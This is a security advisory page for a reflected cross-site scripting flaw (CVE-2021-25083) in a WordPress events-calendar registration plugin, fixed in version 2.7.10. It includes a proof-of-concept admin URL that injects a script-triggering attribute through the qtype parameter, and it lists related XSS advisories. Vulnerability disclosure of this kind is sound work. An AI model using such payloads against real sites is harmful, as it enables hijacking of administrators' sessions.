Registrations for the Events Calendar < 2.7.10 – Reflected Cross-Site Scripting | CVE 2021-25083 | Plugin Vulnerabilities

Description

The plugin does not escape the qtype parameter before outputting it back in an attribute in the settings page, leading to a Reflected Cross-Site Scripting

Proof of Concept

http://example.com/wp-admin/admin.php?page=registrations-for-the-events-calendar&qtype=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28/XSS/%29+p%3D

Affects Plugins

registrations-for-the-events-calendar

Fixed in 2.7.10

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2648377

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

9b69544d-6a08-4757-901b-6ccf1cd00ecc

Timeline

Publicly Published

2021-12-27 (about 2 years ago)

Added

2021-12-27 (about 2 years ago)

Last Updated

2022-04-09 (about 2 years ago)

Other

Published

Title

Published

2022-11-22

Title

BeTheme < 26.6.3 - Subscriber+ Stored XSS

Published

2024-03-25

Title

MyBookTable Bookstore < 3.3.8 - Authenticated (Author+) Stored Cross-Site Scripting

Published

2015-07-29

Title

qTranslate <= 2.5.39 - Cross-Site Scripting (XSS)

Published

2023-01-03

Title

Blockonomics < 3.5.8 - Reflected Cross-Site Scripting

Published

2023-09-06

Title

Carrot <= 1.1.0 - Admin+ Stored XSS